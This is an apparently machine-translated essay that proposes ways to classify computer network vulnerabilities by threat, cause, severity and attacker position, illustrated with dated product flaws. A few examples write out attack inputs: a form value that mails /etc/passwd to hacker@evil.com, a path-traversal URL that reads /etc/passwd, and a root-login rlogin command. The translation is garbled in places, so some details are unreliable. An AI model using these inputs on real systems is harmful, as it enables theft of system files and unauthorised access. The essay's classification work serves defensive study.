The purpose of this article is to summarize some things, solve the problem in the process of trying to construct a vulnerability database, that is how to classify the computer network vulnerabilities. Some of the ideas in this article are not mature, some even themselves are not satisfied with the right to make a point, in order to have in-depth research in this respect tongren exchanges, and improve the common.
A computer network security vulnerability has its various attributes, I think the main can be summed up in the following areas: Vulnerabilities can be caused by the direct threat, the cause of the vulnerability, the severity of the vulnerability, vulnerabilities are used in the way. The following discussion will wrap the holes in these areas to subdivide their classes.
A A possible direct threat to the system by a vulnerability
Can be roughly divided into the following categories, in fact, a system vulnerability to security threats far from its direct possibility, if the attacker has access to the system's general user access rights, he is most likely to use the local vulnerabilities to upgrade themselves to administrator rights:
A Remote Administrator Permissions
An attacker who does not need an account to log on directly to the administrator of a remote system is typically done by attacking a defective system daemon that is performed as root. Most of the vulnerabilities come from buffer overflows, and a small portion comes from the logical flaws of the daemon itself.
Typical vulnerabilities:
IMAP4rev1 The v10.190 version of the Daemon IMAPD authenticate command has no length check when reading parameters, constructs a well-designed auth command string, can overflow the IMAPD buffer, executes the specified command, and as a result of IMAPD running as root, directly obtains the machine root permission.
WindowsNT IIS 4.0 's ISAPI DLL does not properly bounds the entered URL, and if you construct an extra long URL, you can overflow the IIS (Inetinfo.exe) buffer and execute the code we specify. Since the Inetinfo.exe is started as a local system identity, it can be directly granted administrator privileges after overflow.
Early AIX 3.2 rlogind code has authentication logic flaws, with Rlogin victim.com-l-froot, you can log on to the system directly as root without providing a password.
Two Local Administrator rights
An attacker who already has a local account to log on to the system can gain administrator privileges by attacking local suid programs, competitive conditions, and so on.
Typical vulnerabilities:
RedHat Linux Restore is a suid program, its execution relies on a RSH environment variable, by setting the environment variable path, you can make the executable program in the RSH variable run as root, thus obtaining the root authority of the system.
The Solaris 7 Xsun program has a suid bit that does not have a valid boundary check for input parameters and can easily overflow its buffer, running the code we specify as root, thereby gaining administrator privileges.
Under Windows2000, an attacker has the opportunity to have network DDE (a technique for dynamically sharing data between applications on different Windows machines) The agent executes the code that it specifies in the security context of the local system user, thereby elevating permissions and fully controlling the local machine.
Three Normal User access rights
The attacker exploits the vulnerabilities of the server, obtains the system ordinary user access rights, to the Unix class system is usually the shell access, to the Windows system is usually the Cmd.exe access authority, can execute the program with the general user's identity, access the file. Attackers typically attack daemons that run as non-root, and have access rights such as defective CGI programs.
Typical vulnerabilities:
UBB is an extensive forum program running on a variety of UNIX and Windows systems, implemented in Perl, Its 5.19 version has input validation issues, and by submitting carefully constructed form content, you can enable UBB to execute shell commands, because a typical Web server runs as nobody, so you can get a nobody shell. such as the submission of such data: topic= ' 012345.ubb|mail hacker@evil.com </etc/passwd| ', we can get the system passwd files.
RedHat Linux 6.2-band Innd 2.2.2.3 news server, there is a buffer overflow vulnerability, through a carefully constructed news letter can enable the INND server to run the code we specify as news, to get a innd rights shell.
There is a Unicode decoding vulnerability in Windows IIS 4.0-5.0 that allows attackers to run programs on the system with the privileges of the Guest group Cmd.exe. Equivalent to obtain the rights of ordinary users.
Four Privilege elevation
Attackers locally raise their privileges to a non-root level by attacking some defective Sgid program. Getting administrator privileges can be seen as a special privilege elevation, just because the threat is different in size and independent.
Typical vulnerabilities:
RedHat Linux 6.1 with the man program for Sgid man, it has a format bug, through its overflow attack, can enable attackers to get the user rights of the Mans group.
The Write program for Solaris 7 is Sgid TTY, which has a buffer overflow problem that allows an attacker to gain user privileges on the TTY group.
In a windowsnt system, an attacker can mount a "porfile" of other users in the system, allowing other users to execute malicious code, sometimes even administrators, of an attacker.
Five Read restricted files
By exploiting some vulnerabilities, an attacker could read files in the system that he should not have permissions for, which are usually security-related. These vulnerabilities may be caused by incorrect file set permissions, or improper handling of files by privileged processes and accidental dump core, where a portion of a restricted file is dump into a core file.
Typical vulnerabilities:
SunOS 5.5 ftpd existence loophole, the general user may cause the FTPD error to dump out a global readable core file, inside has the shadow file fragment, thus enables the general user to read to the shadow part content.
SuSE 6.2 Suid Program PG, there is a problem with its configuration file processing, when the pb.conf link to the privileged file, you can use PB to read the contents of those files.
Oracle 8.0.3 Enterprise Edition The log file for NT 4.0 is globally readable and plaintext, and it records the password for the connection, which is likely to be read by an attacker.
Six Remote denial of service
Attackers exploit such vulnerabilities to initiate a denial-of-service attack on the system without having to log on, crashing or losing the ability to respond to a system or related application. Such vulnerabilities are usually caused by a flaw in the system itself or its daemon or incorrect settings.
The early Linux and BSD TCP/IP stack blocks are flawed, and attacks can crash the machine by sending a special packet of IP fragments to the system.
The Windows2000 with NetMeeting 3.01 has a flaw, and by sending binary data streams to it, the server's CPU footprint can be up to 100%.
This application can crash by sending a user command with an ANALOGX parameter to the FTP port of Proxy Server 4.04.
Seven Local denial of service
After an attacker has logged on to the system, exploiting such vulnerabilities can crash the system itself or the application. This vulnerability is mainly due to the program's failure to deal with the unexpected situation, such as writing temporary files do not check the existence of files, blindly follow the link.
BSDI 3.x vulnerabilities allow a local user to overwrite any of the systems with garbage, making it easy to make the system unusable.
RedHat 6.1 's Tmpwatch program is flawed, allowing the system to fork () a number of processes, causing the system to lose its responsiveness.
Eight Remote non-authoritative file access
Exploit this type of vulnerability to attack certain files from remote access systems without authorization. Such vulnerabilities are mainly caused by faulty CGI programs that do not properly check user input, allowing attackers to gain access to files by constructing special inputs.
Typical vulnerabilities:
POLL_IT_SSI_V2.0.CGI A vulnerability could allow an attacker to see all the privileged files outside the Web directory and send the following request to the server to see the/etc/passwd file, Http://www.targethost.com/pollit /poll_it_v2.0.cgi?data_dir=\etc\passwd%00
Windows IIS 5.0 has a vulnerability by sending it a special head tag to get the ASP source code, rather than an ASP page after the explanation is executed.
Windows IE has many vulnerabilities that allow malicious Web pages to read local files for browsing users.
Nine Password recovery
Because of the weak password encryption, the attacker can easily analyze the encryption method of the export order, thus enabling the attacker to restore the plaintext in some way when the password is obtained.
Typical vulnerabilities:
Windows passwd v1.2 is used to manage various passwords in the system and to store them together with URLs. But it encrypted stored password encryption method is very fragile, after a simple analysis, can be encrypted from the password to restore the plaintext.
Pcanywhere 9.0 uses a very fragile encryption method to encrypt the password in the transmission, so long as the body listens to the data in the transmission it is easy to decode the plaintext password.
Browsegate is a proxy firewall under Windows, its 2.80.2 version, which stores the encrypted password in the configuration file and the configuration file is readable to all users, but the encryption method is extremely fragile and can easily decode the plaintext.
Ten Deceive
By exploiting such vulnerabilities, an attacker could perform some form of deception on the target system. This is usually due to some flaw in the implementation of the system.
Typical vulnerabilities
There was a vulnerability in Windows ie that allowed a malicious network to insert content into a window of another wind station, thereby deceiving users into entering sensitive data.
There is a vulnerability in the TCP/IP stack under Linux kernel 2.0.35, which can make it easy for an attacker to cheat IP addresses.
Xi. Server Information Disclosure
With such vulnerabilities, an attacker could gather information useful to further attack the system. This type of vulnerability arises mainly because the system program is flawed and is generally incorrect.
Typical vulnerabilities:
There is a vulnerability in Windows IIS 3.0-5.0 that when a nonexistent. idq,.idq file is requested from the system, the machine may return an error message that exposes the IIS installation directory information, such as request http://www.microsoft.com/ Anything.ida, the server returns response:the IDQ file D:\http\anything.ida could not being found. These attacks on attackers can be convenient, such as a widely popular MSADC attack, which needs to know the system's installation directory.
Linux Kernel 2.1.53 The TCP/IP stack is open and closed with a specific response to a particular packet, and an attacker can use this feature for a secret scan of the port.
Some CGI programs such as Dbman (DB.CGI) have vulnerabilities that allow attackers to see some of the system's environment variables, allowing attackers to gain some useful information about the system.
12. Other
Although the above categories include the vast majority of vulnerabilities, it is possible to have some of the above types of vulnerabilities that could not be described and put them here.
B By the cause of the loophole
Classifying them is one of the most annoying aspects of the vulnerability, because the different abstraction levels of the vulnerability study will classify the same vulnerability differently, and the PS competitive condition vulnerability described below is a parameter validation error at the lowest level. Because successive system calls do not check whether they are dealing with the same object, from a higher level, this is a synchronous or competitive condition error, at a higher level, this is a logical error, because the object may be deleted during use. Haven't seen a more perfect classification scheme, including the classification on SecurityFocus, is not satisfactory, and is now broadly divided into the following categories:
Input validation Error
Most buffer overflow vulnerabilities and CGI class vulnerabilities are due to failure to properly check the legality of user-supplied input data.
Access validation Error
The vulnerability arises because there are some available logic errors in the Access Validation section of the program, making it possible to bypass this access control. The rlogin vulnerability of the earlier Aix mentioned above is typical of this.
Competitive conditions
The vulnerability arises when the process of processing files and other entities in the timing and synchronization problems, there may be a window of opportunity to allow attackers to apply external influence. The PS command for the early Solaris system has this type of vulnerability, and PS generates a temporary file based on its PID at/tmp at the time of execution, then chown it as Root and renamed Ps_data. If the PS runtime is able to create this temporary file to point to our interested files, so that after PS execution, we can make any changes to the root ownership file, which can help us to get root permissions.
Unexpected disposition error
The flaw arises when the program fails to take into account unexpected situations in its implementation logic, which should be considered. Most of the/TMP directories are blind to follow symbolic links that cover file vulnerabilities that belong to this type. Example: Sco UNIX OpenServer's/etc/sysadm.d/bin/userosa exists the problem of blindly overwriting debug log files, and the file name is fixed and can completely damage the system by pointing the filename to some privileged file.
Design Error
This category is very general, strictly speaking, most of the vulnerabilities exist are design errors, so all temporarily unable to put into other categories of vulnerabilities, first placed here.
Configuration error
The flaw arises when the system and application are incorrectly configured, or the software is installed in the wrong place, or the wrong configuration parameters, or the wrong access rights, policy errors.
Environment error
A vulnerability caused by an error or malicious setting of some environment variables. An attacker could cause a problematic privileged program to execute an attacker-specified program by resetting the escape character of the Shell's internal ifs,shell, or other environment variables. The above mentioned Redhat Linux Dump program vulnerability is this type.
There is a link between the threat type of the vulnerability and the type of error that created the vulnerability, and the directly linked threat type is connected to the error type in a straight line, and you can see the following illustration:
Remote Administrator Permissions
Input validation Error
Local Administrator rights
Access validation Error
Normal User access rights
Competitive conditions
Privilege elevation unexpected disposition error
Read restricted files
Remote denial of service design error
Local denial of service
Remote non-authoritative file access
Configuration error
Password recovery
Spoofing Environment Error
Server Information Disclosure
You can see that input validation errors are almost related to all vulnerability threats, and design errors and faulty configurations can also cause many threats.
C. Classification of vulnerability severity
Generally speaking, the threat type of a vulnerability determines its severity, and we can divide the severity into high, low, three levels. Remote and local administrator rights roughly corresponds to high, ordinary user rights, elevation of privilege, read restricted files, remote and local denial of service roughly corresponding to intermediate, remote unauthorized file access, password recovery, deception, server information leakage roughly corresponding to low level. But this is only the most common situation, many times the need for concrete analysis, such as a reference to the popular system itself, the remote denial of service vulnerability, it should be a high level. Similarly, a widely used software if there is a weak password problem, there is a password recovery vulnerability, should also be classified as a high level.
D Classification of vulnerabilities being exploited
The existence of a vulnerability is an objective fact, but vulnerabilities can only be exploited in a certain way, each of which requires an attack to be in a particular location in cyberspace, and the possible types of attacks are grouped into the following four categories:
Physical contact
Attackers need to be able to physically contact the target system to exploit such vulnerabilities and pose a threat to the security of the system. Icon:
Attacker host
Host mode
The usual way of exploiting vulnerabilities. The attacker is the client and the attacker is the target host. For example, an attacker could find a remote overflow vulnerability in a daemon on the target host, which could allow an attacker to gain additional access to the host.
Icon:
Attack Attack Machine Host
Client mode
When a user accesses a host on the network, he may be attacked by a host sending his own malicious commands. The client should not overly trust the host. such as Web browser IE has a number of vulnerabilities, you can make some malicious Web sites with HTML tags through those vulnerabilities in the browsing client to execute programs or read and write files.
Icon:
Attack
Client Host
Man-in-the-Middle
When an attacker is in a position where the communication between two machines can be observed or intercepted, the attacker can be considered to be in an intermediary way. Because most of the time the host transmits valuable information in clear text, attackers can easily hack into other machines. For the implementation of some public key cryptography, an attacker can intercept and replace the key disguised as two nodes on the network to circumvent this restriction.
Diagram:
Communication
Host host
listen to or tamper with
attacker
This The article has made the superficial classification to the network security loophole, this is far from a perfect plan, has the interest to welcome the letter exchange experience.
Some of the references I've read: http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/ Scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/ Scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/ scriv/index.html
Http://www.securityfocus.com/data/library/compvuln_draft.pdf
and of course:
http:// Www.xfocus.org/html/query_exploit.html
You can find all the examples of vulnerabilities in this article
